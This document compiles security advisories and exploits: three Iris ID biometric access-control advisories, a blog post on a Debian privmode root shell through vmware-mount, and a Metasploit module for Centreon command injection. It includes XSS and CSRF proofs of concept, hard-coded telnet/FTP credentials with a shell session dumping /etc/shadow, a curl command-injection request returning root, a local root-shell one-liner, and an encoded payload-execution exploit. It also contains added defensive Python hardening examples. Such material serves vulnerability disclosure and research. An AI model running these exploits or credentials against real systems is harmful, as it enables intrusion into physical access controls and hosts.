return;
}
Iris ID IrisAccess ICU 7000-2 Multiple XSS and CSRF Vulnerabilities
Vendor: Iris ID, Inc.
Product web page: http://www.irisid.com
Affected version: ICU Software: 1.00.08
                  ICU OS: 1.3.8
                  ICU File system: 1.3.8
                  EIF Firmware [Channel 1]: 1.9
                  EIF Firmware [Channel 2]: 1.9
                  Iris TwoPi: 1.4.5
Summary: The ICU 7000-2 is an optional component used when the client requires
iris template data to be matched on the secure side of the door. When using ICU
no data is stored in the iCAM7 Iris Reader itself. The ICU also ensures that portal
operation can continue if there is an interruption in communication with the
host computer. In such circumstances, the ICU retains the records of portal activity,
then automatically updates the host upon resumption of host communication. Every
ICU in the iCAM4000 / 7 series runs on a LINUX OS for added reliability. Independent
and fault tolerant, ICUs are connected up to 2 iCAMs and handle up to 100,000 users.
Desc: The application is prone to multiple reflected cross-site scripting vulnerabilities
due to a failure to properly sanitize user-supplied input to the 'HidChannelID' and
'HidVerForPHP' POST parameters in the 'SetSmarcardSettings.php' script. Attackers can
exploit this issue to execute arbitrary HTML and script code in a user's browser session.
The application also allows users to perform certain actions via HTTP requests without
performing any validity checks to verify the requests. This can be exploited to perform
certain actions with administrative privileges if a logged-in user visits a malicious web
site.
Tested on: GNU/Linux 3.0.51 (armv7l)
           mylighttpd v1.0
           PHP/5.5.13
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5345
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5345.php
06.05.2016
--
XSS PoC:
--------
POST /html/SetSmarcardSettings.php HTTP/1.1
Host: 10.0.0.17
Connection: close
Content-Length: x
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzczxmPRCR0fYr2SO
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.8
------WebKitFormBoundaryzczxmPRCR0fYr2SO
Content-Disposition: form-data; name="HidChannelID"
2"><script>alert(1)</script>
------WebKitFormBoundaryzczxmPRCR0fYr2SO
Content-Disposition: form-data; name="HidcmbBook"
0
------WebKitFormBoundaryzczxmPRCR0fYr2SO
Content-Disposition: form-data; name="cmbBook"
0
------WebKitFormBoundaryzczxmPRCR0fYr2SO
Content-Disposition: form-data; name="HidDisOffSet"
13
------WebKitFormBoundaryzczxmPRCR0fYr2SO
Content-Disposition: form-data; name="txtOffSet"
13
------WebKitFormBoundaryzczxmPRCR0fYr2SO
Content-Disposition: form-data; name="HidDataFormat"
1
------WebKitFormBoundaryzczxmPRCR0fYr2SO
Content-Disposition: form-data; name="HidDataFormatVal"
1
------WebKitFormBoundaryzczxmPRCR0fYr2SO
Content-Disposition: form-data; name="DataFormat"
1
------WebKitFormBoundaryzczxmPRCR0fYr2SO
Content-Disposition: form-data; name="HidFileAvailable"
0
------WebKitFormBoundaryzczxmPRCR0fYr2SO
Content-Disposition: form-data; name="HidEncryAlg"
0
------WebKitFormBoundaryzczxmPRCR0fYr2SO
Content-Disposition: form-data; name="EncryAlg"
0
------WebKitFormBoundaryzczxmPRCR0fYr2SO
Content-Disposition: form-data; name="HidFileType"
0
------WebKitFormBoundaryzczxmPRCR0fYr2SO
Content-Disposition: form-data; name="HidIsFileSelect"
0
------WebKitFormBoundaryzczxmPRCR0fYr2SO
Content-Disposition: form-data; name="HidUseAsProxCard"
0
------WebKitFormBoundaryzczxmPRCR0fYr2SO
Content-Disposition: form-data; name="HidVerForPHP"
1.00.08"><script>alert(2)</script>
------WebKitFormBoundaryzczxmPRCR0fYr2SO--
CSRF PoC:
---------
<html>
<body>
<form action="http://10.0.0.17/cgi-bin/SetRS422Settings" method="POST">
<input type="hidden" name="HidChannelID" value="2" />
<input type="hidden" name="RS422State" value="0" />
<input type="hidden" name="HidRS422BitsSec" value="9" />
<input type="hidden" name="HidRS422DataBits" value="3" />
<input type="hidden" name="HidRS422Parity" value="1" />
<input type="hidden" name="HidRS422StopBits" value="2" />
<input type="hidden" name="HidRS422StartCharLength" value="2" />
<input type="hidden" name="HidRS422EndCharLength" value="2" />
<input type="hidden" name="HidRS422StartOne" value="7F" />
<input type="hidden" name="HidRS422StartTwo" value="F7" />
<input type="hidden" name="HidRS422EndOne" value="0D" />
<input type="hidden" name="HidRS422EndTwo" value="0A" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
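Both findings above come down to two controls the SetSmarcardSettings.php handler lacks: attribute-safe output encoding for the values it writes back into hidden inputs, and an anti-CSRF token on a state-changing POST. The following is an added example in Python, not the vendor's PHP, showing both. It assumes HidChannelID names one of the two EIF channels (so only "1" or "2" is accepted, falling back to 1 as the PHP does for 0) and uses a constructed SESSION_SECRET in place of a per-device random key.

```python
import hashlib
import hmac
import html
import secrets
from typing import Mapping, Optional

# Constructed example key; a real deployment generates this per device and
# keeps it out of the page source.
SESSION_SECRET = b"constructed-example-secret-rotate-me"


def hidden_input(name: str, value: str) -> str:
    """Render <input type="hidden"> with both fields HTML-attribute-encoded.

    html.escape(quote=True) turns the double quote into &quot;, so a value
    such as 2"><script>... can no longer terminate the attribute.
    """
    return '<input type="hidden" name="%s" value="%s">' % (
        html.escape(name, quote=True), html.escape(value, quote=True))


def channel_id(raw: str) -> int:
    """Allowlist for HidChannelID: channel 1 or 2, else 1 (assumption: two channels)."""
    return int(raw) if raw in ("1", "2") else 1


def issue_csrf_token(session_id: str) -> str:
    """Token = nonce.HMAC(secret, session_id:nonce); bound to this session only."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SESSION_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(session_id: str, token: str) -> bool:
    """Recompute the MAC for this session and compare in constant time."""
    nonce, _, mac = token.partition(".")
    if not nonce or not mac:
        return False
    expected = hmac.new(SESSION_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, mac)


def handle_smartcard_post(form: Mapping[str, str], session_id: str) -> Optional[str]:
    """Hardened shape of the handler: None means the request was refused.

    A forged cross-site form (as in the CSRF PoC) carries no valid token for
    the victim's session and is dropped before any setting is touched.
    """
    if not verify_csrf_token(session_id, form.get("csrf_token", "")):
        return None
    ch = channel_id(form.get("HidChannelID", ""))
    version = form.get("HidVerForPHP", "")
    return hidden_input("HidChannelID", str(ch)) + hidden_input("HidVerForPHP", version)


if __name__ == "__main__":
    token = issue_csrf_token("demo-session")
    page = handle_smartcard_post(
        {"csrf_token": token,
         "HidChannelID": '2"><script>alert(1)</script>',
         "HidVerForPHP": '1.00.08"><script>alert(2)</script>'},
        "demo-session")
    print(page)   # the payloads come back as inert &lt;script&gt; text
```

The token should be emitted into the form as another hidden field and tied to the session cookie; since the device web interface is reached by IP on the local network, the same-origin check this provides is the only thing that stops a logged-in operator's browser from being used as the request's source.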
Iris ID IrisAccess iCAM4000/iCAM7000 Hardcoded Credentials Remote Shell Access
Vendor: Iris ID, Inc.
Product web page: http://www.irisid.com
                  http://www.irisid.com/productssolutions/irisaccesssystem/irisaccess4000/
                  http://www.irisid.com/productssolutions/hardwareproducts/icam4000series/
                  http://www.irisid.com/productssolutions/irisaccesssystem/irisaccess7000/
                  http://www.irisid.com/productssolutions/hardwareproducts/icam7-series/
Affected version: iCAM4000:
                    iCAM Software: 3.09.02
                    iCAM File system: 1.3
                    CMR Firmware: 5.5 and 3.8
                    EIF Firmware: 9.5 and 8.0
                    HID iClass Library: 2.01.05
                    ImageData Library: 1.153
                    Command Process: 1.02
                  iCAM7000:
                    iCAM Software: 8.01.07
                    iCAM File system: 1.4.0
                    EIF Firmware: 1.9
                    HID iClass Library: 1.00.00
                    ImageData Library: 01.01.32
                    EyeSeek Library: 5.00
                    Countermeasure Library: 3.00
                    LensFinder Library: 5.00
                    Tilt Assist Library: 4.00
Summary: The 4th generation IrisAccess™ 7000 series iris recognition solution offered
by Iris ID provides fast, secure, and highly accurate, non-contact identification
by the iris of the eye. The iCAM7000's versatility and flexibility allows for easy
integration with many Wiegand and network based access control, time and attendance,
visitor management and point of sale applications.
The iCAM4000 or 4010 with embedded smart card is the best-selling model in the IrisAccess
4000 range. Simultaneous two-eye capture, face-badging camera, motorized height adjust,
iCAM4000 is easily configured for use in a kiosk as well as in applications where a traditional
wall-mount is used.
Desc: The Iris ID IrisAccess iCAM4000/7000 series suffer from a use of hard-coded credentials.
When visiting the device interface with a browser on port 80, the application loads an applet
JAR file 'ICAMClient.jar' into the user's browser which serves additional admin features. In the
JAR file there is an account 'rou' with password 'iris4000' that has read and limited write
privileges on the affected node. An attacker can log in to the device with these credentials
over telnet on port 23 and read sensitive information, or over FTP on port 21 (where the
account is allowed EVERYTHING) and upload malicious content.
=====================================================================================
/html/ICAMClient.jar (ICAMClient.java):
---------------------------------------
97: param_host = getParameter("host");
98: param_user = "rou";//getParameter("user");
99: param_pass = "iris4000";//getParameter("pass"); // password
100: param_path = getParameter("path"); // path on the server
/etc/ftpd/ftpd.conf:
--------------------
69: # User list:
70: # Format: user=<login> <passwd> <subdir> <maxlogins> <flags>
71: # <login> user name
72: # <passwd> password or * for anonymous access
73: # <subdir> (internally appended to serverroot)
74: # the user has access to the WHOLE SUBTREE,
75: # if the server has access to it
76: # <maxlogins> maximal logins with this usertype
77: # <flags> D - download
78: # U - upload + making directories
79: # O - overwrite existing files
80: # M - allows multiple logins
81: # E - allows erase operations
82: # A - allows EVERYTHING(!)
101:
103: user=rou iris4000 / 5 A
=====================================================================================
Tested on: GNU/Linux 2.4.19 (armv5tel)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5347
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5347.php
06.05.2016
--
telnet [IP]
iCAM4000 login: rou
Password:
[rou@iCAM4000 rou]# id
uid=500(rou) gid=500(rou) groups=500(rou)
[rou@iCAM4000 rou]# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0:operator:/root:
games:x:12:100:games:/usr/games:
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/home/ftp:
nobody:x:99:99:Nobody:/:
rou:x:500:500::/home/rou:/bin/bash
[rou@iCAM4000 rou]# cd /web
[rou@iCAM4000 /web]# ls -al
total 0
drwxrwxr-x 1 rou rou 0 Jul 26 07:22 .
drwxr-xr-x 1 root root 0 Jan 1 1970 ..
drwxrwxr-x 1 rou rou 0 Jan 31 2013 cgi-bin
drwxrwxr-x 1 rou rou 0 Jan 31 2013 html
drwxrwxr-x 1 rou rou 0 Jan 31 2013 images
[rou@iCAM4000 /web]# cat /etc/shadow
root:{{REMOVED}}
bin:*:10897:0:99999:7:::
daemon:*:10897:0:99999:7:::
adm:*:10897:0:99999:7:::
lp:*:10897:0:99999:7:::
sync:*:10897:0:99999:7:::
shutdown:*:10897:0:99999:7:::
halt:*:10897:0:99999:7:::
mail:*:10897:0:99999:7:::
news:*:10897:0:99999:7:::
uucp:*:10897:0:99999:7:::
operator:*:10897:0:99999:7:::
games:*:10897:0:99999:7:::
gopher:*:10897:0:99999:7:::
ftp:*:10897:0:99999:7:::
nobody:*:10897:0:99999:7:::
rou:$1$LfhrWa0e$Crfm4qz7MFEaWaA77NFci0:12702:0:99999:7:::
[rou@iCAM4000 /web]# cat /etc/issue
Iris@ID iCAM4000 Linux (experimental)
Kernel 2.4.19-rmk7-pxa1 on an armv5tel
[rou@iCAM4000 /web]# ls -al html/
total 289
drwxrwxr-x 1 rou rou 0 Jan 31 2013 .
drwxrwxr-x 1 rou rou 0 Jul 26 07:22 ..
-rw-rw-r-- 1 rou rou 4035 Jan 31 2013 DHCPSettings_reboot.htm
-rw-rw-r-- 1 rou rou 100614 Jan 10 2008 ICAMClient.jar
-rw-rw-r-- 1 rou rou 6376 Jan 31 2013 WiegandSettings.htm
-rw-rw-r-- 1 rou rou 5643 Jan 31 2013 authentication.htm
-rw-rw-r-- 1 rou rou 6166 Jan 31 2013 changeusername.htm
-rw-rw-r-- 1 rou rou 4816 Jan 31 2013 displayconfigsettings.htm
-rw-rw-r-- 1 rou rou 5643 Jan 31 2013 downloadauthentication.htm
-rw-rw-r-- 1 rou rou 4850 Jan 31 2013 downloadvoice_result.htm
-rw-rw-r-- 1 rou rou 3237 Jan 31 2013 error.htm
-rw-rw-r-- 1 rou rou 3234 Jan 31 2013 error_ip.htm
-rw-rw-r-- 1 rou rou 3248 Jan 31 2013 error_loginfailure.htm
-rw-rw-r-- 1 rou rou 3349 Jan 31 2013 error_usb_ip.htm
-rw-rw-r-- 1 rou rou 6128 Jan 31 2013 ftpupload.htm
-rw-rw-r-- 1 rou rou 5331 Jan 31 2013 iCAMConfig.htm
-rw-rw-r-- 1 rou rou 4890 Jan 31 2013 icamconfig_reboot.htm
-rw-rw-r-- 1 rou rou 5314 Jan 31 2013 index.htm
-rw-rw-r-- 1 rou rou 7290 Jan 31 2013 main.htm
-rw-rw-r-- 1 rou rou 3662 Jan 31 2013 reboot_result.htm
-rw-rw-r-- 1 rou rou 5782 Jan 31 2013 smartcardauthentication.htm
-rw-rw-r-- 1 rou rou 17783 Jan 31 2013 smartcardconfig.htm
-rw-rw-r-- 1 rou rou 4895 Jan 31 2013 smartcardconfig_reboot.htm
-rw-rw-r-- 1 rou rou 5809 Jan 31 2013 smartcardconfig_result.htm
-rw-rw-r-- 1 rou rou 3672 Jan 31 2013 systeminfo.htm
-rw-rw-r-- 1 rou rou 5870 Jan 31 2013 updateicamconfig.htm
-rw-rw-r-- 1 rou rou 4239 Jan 31 2013 updateicamconfig_result.htm
-rw-rw-r-- 1 rou rou 6612 Jan 31 2013 updatenetworksettings.htm
-rw-rw-r-- 1 rou rou 4651 Jan 31 2013 updatenetworksettings_result.htm
-rw-rw-r-- 1 rou rou 5014 Jan 31 2013 updatenetworksettings_state.htm
-rw-rw-r-- 1 rou rou 3985 Jan 31 2013 upload.htm
-rw-rw-r-- 1 rou rou 5645 Jan 31 2013 uploadauthentication.htm
-rw-rw-r-- 1 rou rou 4737 Jan 31 2013 uploadiriscapture_result.htm
-rw-rw-r-- 1 rou rou 6028 Jan 31 2013 voicemessagedownload.htm
-rw-rw-r-- 1 rou rou 6299 Jan 31 2013 voicemessageupdate.htm
-rw-rw-r-- 1 rou rou 5645 Jan 31 2013 wiegandauthentication.htm
-rw-rw-r-- 1 rou rou 4893 Jan 31 2013 wiegandconfig_reboot.htm
[rou@iCAM4000 /web]# echo $SHELL
/bin/bash
[rou@iCAM4000 /web]# echo pwn > test.write
[rou@iCAM4000 /web]# cat test.write
pwn
[rou@iCAM4000 /web]# rm -rf test.write
[rou@iCAM4000 /web]# cd /etc/ftpd
[rou@iCAM4000 ftpd]# pwd
/etc/ftpd
[rou@iCAM4000 ftpd]# cat ftpd.conf |grep user=rou
user=rou iris4000 / 5 A
[rou@iCAM4000 ftpd]# ^D
Connection to host lost.
Iris ID IrisAccess ICU 7000-2 Remote Root Command Execution
Vendor: Iris ID, Inc.
Product web page: http://www.irisid.com
http://www.irisid.com/productssolutions/hardwareproducts/icu-7000-2/
Affected version: ICU Software: 1.00.08
ICU OS: 1.3.8
ICU File system: 1.3.8
EIF Firmware [Channel 1]: 1.9
EIF Firmware [Channel 2]: 1.9
Iris TwoPi: 1.4.5
Summary: The ICU 7000-2 is an optional component used when the client requires
iris template data to be matched on the secure side of the door. When using ICU
no data is stored in the iCAM7 Iris Reader itself. The ICU also ensures that portal
operation can continue if there is an interruption in communication with the
host computer. In such circumstances, the ICU retains the records of portal activity,
then automatically updates the host upon resumption of host communication. Every
ICU in the iCAM4000 / 7 series runs on a Linux OS for added reliability. Independent
and fault tolerant, ICUs are connected to up to 2 iCAMs and handle up to 100,000 users.
Desc: The Iris ID IrisAccess ICU 7000-2 device suffers from an unauthenticated remote
command execution vulnerability. The vulnerability exists because several POST parameters
handled by the '/html/SetSmarcardSettings.php' script are not sanitized before being
concatenated into the '$CommandForExe' string, which is then passed to PHP's exec()
while updating the Smart Card Settings. Since that string invokes the '/cgi-bin/setsmartcard'
CGI binary with the affected parameters as its arguments, an attacker can inject shell
metacharacters through any of them to execute arbitrary system commands as the root
user and bypass the biometric access control in place.
=====================================================================================
/html/SetSmarCardSettings.php:
------------------------------
53: <?php
54: $ChNo = $_POST['HidChannelID'];
55: if(0 == $ChNo )
56: echo "1";
57: else
58: echo $ChNo;
59: ?>
61: <?php
62: echo "<input type = \"hidden\" name=\"HidChannelID\" value=\"$ChNo\">";
63: echo "<input type=\"hidden\" name=\"ssid\" value=\"1234\">"
64: ?>
81: <td class="menuMain">Smart Card Settings</td>
88: <!-- Content: BOF -->
97: <?php
99: $FileAvaToUpload = $_POST['HidIsFileSelect'];
100: //echo "<br>File availabe is: ";
101: //echo $FileAvaToUpload;
102: //echo "<br>";
104: $BookVal = $_POST['cmbBook'];
105: //echo "<br>BookVal is ";
106: //echo $BookVal;
108: //echo "<br>Channel value is ";
109: //echo $ChNo;
111: $OffSet = $_POST['txtOffSet'];
112: //echo "<br>Offset is ";
113: //echo $OffSet;
115: $DataFormat = $_POST['DataFormat'];
117: //echo "<br>DataFormat is ";
118: //echo $DataFormat;
120: $EncryptAlg = $_POST['EncryAlg'];
122: if(0 == $DataFormat )
123: $EncryptAlg = 4;
125: //echo "<br>Encryption Algarithm is ";
126: //echo $EncryptAlg;
128: $UseAsProxyCard = $_POST['chkUseAsProxCard'];
129: if( "" == $UseAsProxyCard )
130: $UseAsProxyCard = "0";
132: //echo "<br>Use as ProxyCard is ";
133: //echo $UseAsProxyCard;
135: $target_dir = "/tmp/temp_SmartCardKey";
137: //$target_dir = $target_dir . basename( $_FILES["file1"]["name"]);
139: if(1 == $FileAvaToUpload ) {
140: if (move_uploaded_file($_FILES["file1"]["tmp_name"], $target_dir)) {
141: //echo "The file ". basename( $_FILES["file1"]["name"]). " has been uploaded.";
142: } else {
143: //echo "Sorry, there was an error uploading your file.";
144: }
145: }
147: $out = null;
148: $rc= 0;
149: $CommandForExe = "../cgi-bin/setsmartcard $ChNo $BookVal $OffSet $DataFormat $EncryptAlg $UseAsProxyCard $FileAvaToUpload";
150: //$CommandForExe = "../cgi-bin/setsmartcard 1 0 10 1 1 0";
151: echo exec($CommandForExe, $out, $rc);
153: //print_r( $out);
154: //echo 'rc = '.$rc."\n";
156: //echo "After calling binary";
158: //echo "Return value is: ";
159: //echo $rc;
160: //echo $out;
162: $sICUVersion = $_POST['HidVerForPHP'];
163: ?>
=====================================================================================
Vulnerable parameters: DataFormat
EncryAlg
HidChannelID
HidIsFileSelect
cmbBook
txtOffSet
Tested on: GNU/Linux 3.0.51 (armv7l)
mylighttpd v1.0
PHP/5.5.13
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5346
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5346.php
06.05.2016
--
Request (cmbBook=0|id #):
-------------------------
[lqwrm@lalaland /]# curl -i -s -k -X 'POST' \
-H 'User-Agent: joxypoxy/7.2.6' -H 'Content-Type: application/x-www-form-urlencoded' \
--data-binary $'HidChannelID=2&HidcmbBook=0&cmbBook=0|id+%23&HidDisOffSet=13&txtOffSet=37&HidDataFormat=1&HidDataFormatVal=1&DataFormat=1&HidFileAvailable=0&HidEncryAlg=0&EncryAlg=0&HidFileType=0&HidIsFileSelect=0&HidUseAsProxCard=0&HidVerForPHP=1.00.08\x0d\x0a' \
'http://[TARGET]/html/SetSmarcardSettings.php'
Response:
---------
HTTP/1.1 200 OK
X-Powered-By: PHP/5.5.13
Content-type: text/html
Connection: close
Date: Thu, 09 May 2016 14:40:39 GMT
Server: mylighttpd v1.0
Content-Length: 11660
...
</tr>
uid=0(root) gid=0(root) <tr>
<td colspan="2">
...
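The request above works because exec() receives one string that /bin/sh parses, so a pipe or semicolon in cmbBook ends the setsmartcard command and starts the attacker's. The Python below is an added example, not the vendor's code or the advisory's PoC: it rebuilds the same command string from the POST fields (in the order the PHP concatenates them, with the script's own defaults), runs it the way exec() does, and beside it shows the hardened form, an integer allow-list plus an argv call (the PHP equivalent is an is_numeric() check plus escapeshellarg()). /bin/echo stands in for the ../cgi-bin/setsmartcard binary; that substitution is an assumption made so the example runs without the device.

```python
import re
import subprocess

# Added example (not the vendor's code): models the command string that
# SetSmarcardSettings.php hands to exec() and shows the hardened form.
# Stand-in for ../cgi-bin/setsmartcard so the example runs without the
# device: /bin/echo just prints the arguments it received (assumption).
SETSMARTCARD = ["echo", "setsmartcard"]

# Order in which the PHP concatenates the POST fields into the command line.
PARAM_ORDER = ("HidChannelID", "cmbBook", "txtOffSet", "DataFormat",
               "EncryAlg", "chkUseAsProxCard", "HidIsFileSelect")

# All seven values are small integers on the legitimate form.
INTEGER = re.compile(r"[0-9]{1,5}")


def argv_from_post(post):
    """Apply the script's own defaults (empty proxy flag -> "0",
    DataFormat 0 forces EncryptAlg 4) and return the seven argument strings."""
    vals = {k: post.get(k, "") for k in PARAM_ORDER}
    if vals["chkUseAsProxCard"] == "":
        vals["chkUseAsProxCard"] = "0"
    if vals["DataFormat"] == "0":
        vals["EncryAlg"] = "4"
    return [vals[k] for k in PARAM_ORDER]


def run_unsafe(post):
    """What exec($CommandForExe) does: a single string parsed by /bin/sh -c,
    so '|', ';', '`' and '$(...)' inside any field become shell syntax."""
    cmd = " ".join(SETSMARTCARD + argv_from_post(post))
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def validate(post):
    """Allow-list check: raise ValueError unless every forwarded value is an integer."""
    for name, value in zip(PARAM_ORDER, argv_from_post(post)):
        if not INTEGER.fullmatch(value):
            raise ValueError("%s: rejected value %r" % (name, value))


def run_safe(post):
    """Hardened form: validated values passed as an argv list, so no shell ever
    parses them (the Python equivalent of is_numeric() plus escapeshellarg())."""
    validate(post)
    return subprocess.run(SETSMARTCARD + argv_from_post(post),
                          capture_output=True, text=True).stdout


if __name__ == "__main__":
    # Constructed request mirroring the advisory's PoC (cmbBook=0|<cmd> #).
    evil = {"HidChannelID": "2", "cmbBook": "0|id #", "txtOffSet": "37",
            "DataFormat": "1", "EncryAlg": "0", "HidIsFileSelect": "0"}
    print(run_unsafe(evil), end="")   # the uid line: `id` ran, setsmartcard did not
    try:
        run_safe(evil)
    except ValueError as e:
        print("blocked:", e)
```

With cmbBook=0|id #, run_unsafe() returns the output of id, exactly as the curl request does; run_safe() refuses the same input before any process is spawned, which is the check the PHP should perform on every field it forwards.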
// Source: http://blog.cmpxchg8b.com/2013/08/security-debianisms.html
On most modern Linux systems, /bin/sh is provided by bash, which detects that it's being invoked as sh, and attempts to mimic traditional sh. As everyone who works in security quickly learns, bash will drop privileges very early if uid != euid.
  if (running_setuid && privileged_mode == 0)
    disable_priv_mode ();
Where disable_priv_mode is defined as:
void
disable_priv_mode ()
{
  setuid (current_user.uid);
  setgid (current_user.gid);
  current_user.euid = current_user.uid;
  current_user.egid = current_user.gid;
}
Non-Linux systems tend to use pdksh as /bin/sh, which also supports privmode since version 5.0.5:
	/* Turning off -p? */
	if (f == FPRIVILEGED && oldval && !newval) {
#ifdef OS2
		;
#else /* OS2 */
		setuid(ksheuid = getuid());
		setgid(getgid());
#endif /* OS2 */
	} else if (f == FPOSIX && newval) {
This is surprisingly effective at mitigating some common vulnerability classes and misconfigurations. Indeed, Chet Ramey (bash author and maintainer) explains that the purpose of this is to prevent "bogus system(3) calls in setuid executables", see section 7 of the bash NOTES file.
However, this never really happens on Debian derived systems. Debian (and therefore Ubuntu) will use dash by default (see https://wiki.debian.org/DashAsBinSh), or disable it with this patch if you choose to use bash:
http://patch-tracker.debian.org/patch/series/view/bash/4.2+dfsg-0.1/privmode.diff
A nice example of this failing can be observed in the VMware utilities, which try to invoke lsb_release with popen() to learn about the current execution environment. This means you can get a nice easy root shell like this on any Debian/Ubuntu derived system with VMware installed:
$ cc -xc - -olsb_release<<<'main(){system("sh>`tty` 2>&1");}';PATH=.:$PATH vmware-mount
# whoami
root
It looks like Debian originally decided they didn't want privmode because it broke UUCP (!?).
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=52586
VMware do list Debian/Ubuntu as supported host platforms though, so they have published a fix for this issue today. If you care about this and can't wait for the patch, you can temporarily remove the setuid bit from vmware-mount like this:
# chmod u-s /usr/bin/vmware-mount
Note that it is almost impossible to use popen() or system() safely in a setuid program without privmode, even if you specify the full path. This is a fun example from back in 2005, but there are lots more cases.
In conclusion, too bad if an otherwise unexploitable bug becomes exploitable, that's the price you pay for high quality uucp support in 2013 ;-)
P.S. If you don't know what uucp is, you can read more about it on fidonet or at my gopher site.
P.P.S. I sent the dash maintainers a patch today, but I'm not sure if they're interested.
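To make the failure mode concrete, the Python below is an added example (not from the blog, bash or VMware): it builds two throwaway lsb_release scripts, one in a trusted directory and one in the attacker's working directory, then resolves the name the way popen() would with PATH=.:$PATH and the way a privileged helper should, through a fixed directory list, by absolute path, without a shell and with a minimal environment. The directory names and the scripts' output strings are constructed for the demo.

```python
import os
import stat
import subprocess
import tempfile

# Added example (not from the blog or VMware): reproduces the PATH=.:$PATH
# trick against a popen()-style lookup and shows a lookup that ignores PATH.
# Both "binaries" are constructed shell scripts so the demo runs anywhere.


def make_script(directory, name, message):
    """Write an executable script that prints `message` (constructed fixture)."""
    path = os.path.join(directory, name)
    with open(path, "w") as f:
        f.write("#!/bin/sh\necho %s\n" % message)
    os.chmod(path, os.stat(path).st_mode | stat.S_IXUSR)
    return path


def run_like_popen(command, path_env, cwd):
    """popen("lsb_release") equivalent: /bin/sh -c with the caller's PATH and
    cwd, so a '.' entry in PATH resolves to whatever the caller dropped there."""
    return subprocess.run(command, shell=True, cwd=cwd, env={"PATH": path_env},
                          capture_output=True, text=True).stdout.strip()


def run_pinned(command, trusted_dirs):
    """Hardened form for a privileged helper: resolve only inside a fixed
    directory list, exec by absolute path without a shell, and pass a
    minimal environment instead of the caller's."""
    for directory in trusted_dirs:
        candidate = os.path.join(directory, command)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            env = {"PATH": "/usr/bin:/bin", "IFS": " \t\n"}
            return subprocess.run([candidate], env=env, capture_output=True,
                                  text=True).stdout.strip()
    raise FileNotFoundError("%s not found in trusted directories" % command)


def demo():
    """Returns (what the PATH lookup ran, what the pinned lookup ran)."""
    with tempfile.TemporaryDirectory() as trusted, tempfile.TemporaryDirectory() as attacker_cwd:
        make_script(trusted, "lsb_release", "DistributorID=Debian")  # the genuine tool
        make_script(attacker_cwd, "lsb_release", "PWNED")            # attacker's copy in '.'
        hijacked = run_like_popen("lsb_release", ".:" + trusted, attacker_cwd)
        pinned = run_pinned("lsb_release", (trusted,))
    return hijacked, pinned


if __name__ == "__main__":
    print(demo())  # ('PWNED', 'DistributorID=Debian')
```

Pinning the lookup removes the PATH dependence the post describes; it does not replace privmode, since a setuid program that still calls system() or popen() with caller-influenced input stays exposed through other environment variables and through the arguments themselves.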
##
## This module requires Metasploit: http://metasploit.com/download
## Current source: https://github.com/rapid7/metasploit-framework
###
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
Rank = ExcellentRanking
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Centreon Web Useralias Command Execution',
'Description' => %q(
Centreon Web Interface <= 2.5.3 utilizes an ECHO for logging SQL
errors. This functionality can be abused for arbitrary code
execution, and can be triggered via the login screen prior to
authentication.
),
'Author' =>
[
'h00die <mike@shorebreaksecurity.com>', # module
'Nicolas CHATELAIN <n.chatelain@sysdream.com>' # discovery
],
'References' =>
[
[ 'EDB', '39501' ]
],
'License' => MSF_LICENSE,
'Platform' => ['python'],
'Privileged' => false,
'Arch' => ARCH_PYTHON,
'Targets' =>
[
[ 'Automatic Target', {}]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 26 2016'
)
)
register_options(
[
Opt::RPORT(80),
OptString.new('TARGETURI', [ true, 'The URI of the Centreon Application', '/centreon/'])
], self.class
)
end
def check
begin
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'index.php'),
'method' => 'GET'
)
/LoginInvitVersion"><br \/>[\s]+(?<version>[\d]{1,2}\.[\d]{1,2}\.[\d]{1,2})[\s]+<\/td>/ =~ res.body
if version && Gem::Version.new(version) <= Gem::Version.new('2.5.3')
vprint_good("Version Detected: #{version}")
Exploit::CheckCode::Appears
else
Exploit::CheckCode::Safe
end
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
end
end
def exploit
begin
vprint_status('Sending malicious login')
send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'index.php'),
'method' => 'POST',
'vars_post' =>
{
'useralias' => "$(echo #{Rex::Text.encode_base64(payload.encoded)} |base64 -d | python)\\",
'password' => Rex::Text.rand_text_alpha(5)
}
)
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
end
end
end
_ _ _ _ _ _ _ _ _ _
/ \ / \ / \ / \ / \ / \ / \ / \ / \ / \
